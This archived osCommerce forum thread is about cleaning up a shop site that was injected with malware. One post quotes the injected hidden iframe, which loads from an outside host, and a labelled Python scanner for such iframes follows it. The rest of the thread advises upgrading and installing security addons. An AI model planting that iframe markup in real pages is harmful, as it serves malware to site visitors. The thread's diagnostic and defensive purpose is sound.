Malware injection in osCommerce 2.2 RC


FranzderFranke

Hello,

Today I got a mail from Google AdWords saying that I have malware on my osCommerce 2.2 RC website. Some malware checker told me the same.

I had this problem one year ago. That time I installed an old backup and lots of security plugins - even a nice guy from The UK Waltons looked over it.

Today I reinstalled an SQL backup from yesterday and everything seems fine - the malware checker says it's fine now, too.

But I don't know what the problem was. No data on the webspace was changed, so it looks like a malware injection into SQL.

I did 99 % of this: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

I don't have much info about that malware - Kaspersky told me: HEUR:Trojan Script.Generic / AdWords: Malware / Webmaster Tools: Nothing (but this doesn't mean anything because they work slowly)

What should I do now? I am pretty sure this will happen again.

Link to comment
Share on other sites

You should upgrade your old version of osCommerce by nuking it and installing the latest stable version.

 

But then I have to start from the beginning, and I have lots of plugins for connecting to merchandise management programs that don't work with new versions, I think... :(

Link to comment
Share on other sites

 

It might be better to do 100%

 

Cheers

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 


Link to comment
Share on other sites

Now I have more information about the iframe code injection:

 

8:< meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
9:< !-- EOF: Header Tags SEO Generated Meta Tags -->
10:< base href="http://www.xxx.de/">
11:< link rel="stylesheet" type="text/css" href="stylesheet.css">
12:< /head> < style> .hlc4ygqt3 { position:absolute; left:-1174px; top:-1822px} < /style> < div class="hlc4ygqt3"> < if​rame src="http://ugrpcfr.hopto.org/zwtzzadbm8tsfklpbl9h3bg9am7pbdvmvy" width="153" height="363"> < /if​rame > < /div>
13:< body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
14:< !-- header //-->

 

It only got listed by the Bing robot.

 

btw. Does someone know if the http://sitecheck3.sucuri.net/ firewall is useful?

Link to comment
Share on other sites
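The markup quoted in the post above hides an iframe inside a div whose CSS class is positioned far off-screen. As an added example (not part of the original thread and not osCommerce code), the following Python check flags that pattern in a page's HTML; the sample page, the class name and the hosts `shop.example` and `injected.example` are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

CSS_RULE = re.compile(r"\.([\w-]+)\s*\{([^}]*)\}")
ABSOLUTE = re.compile(r"position\s*:\s*absolute", re.I)
FAR_OFFSCREEN = re.compile(r"\b(?:left|top)\s*:\s*-\d{3,}px", re.I)  # e.g. left:-1174px

def offscreen_classes(html):
    """Class names whose CSS rule places the element far outside the viewport."""
    return {name for name, body in CSS_RULE.findall(html)
            if ABSOLUTE.search(body) and FAR_OFFSCREEN.search(body)}

class _IframeAudit(HTMLParser):
    def __init__(self, hidden, site_host):
        super().__init__()
        self.hidden, self.site_host = hidden, site_host
        self.div_stack = []   # one bool per open <div>: does it use a hidden class?
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "div":
            classes = set((attrs.get("class") or "").split())
            self.div_stack.append(bool(classes & self.hidden))
        elif tag == "iframe":
            src = attrs.get("src") or ""
            host = urlparse(src).hostname          # None for relative URLs
            offscreen = any(self.div_stack)
            external = host is not None and host != self.site_host
            if offscreen or external:
                self.findings.append(
                    {"src": src, "offscreen": offscreen, "external": external})

    def handle_endtag(self, tag):
        if tag == "div" and self.div_stack:
            self.div_stack.pop()

def scan(html, site_host):
    """Return iframes that are hidden off-screen or load from another host."""
    audit = _IframeAudit(offscreen_classes(html), site_host)
    audit.feed(html)
    audit.close()
    return audit.findings

# Constructed sample modelled on the quoted markup; hosts are placeholders.
SAMPLE = """<head><base href="http://shop.example/"></head>
<style> .hx1 { position:absolute; left:-1174px; top:-1822px} </style>
<div class="hx1"><iframe src="http://injected.example/path" width="153" height="363"></iframe></div>
<body><iframe src="/banner.html"></iframe></body>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE, "shop.example"):
        print(finding)
```

The same `scan` function can be run over HTML fragments exported from database text fields as well as over fetched pages, which helps narrow down where the markup is stored.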

As 'burt' stated, the content of the hack code is not really important, but rather how the attacker was able to insert that code into a page on your website.

 

There are two usual methods: one is via a security hole in the web cart, of which there are a few big ones in v2.2, and the other is via a security hole in the web server that the site is hosted on.

 

If you are intent on using v2.2, then after cleaning up your website you should install the osCSec addon.

 

http://addons.oscommerce.com/info/8929

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

  • 2 weeks later...

The other point that needs to be stressed is that some shared hosting services are notorious for crap security on their servers. It is the luck of the draw whether you get a good one; many of the free hosting sites have little security and rely on suspending your free site, rather than fixing their security issues, as their primary means of dealing with being hacked.


Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.
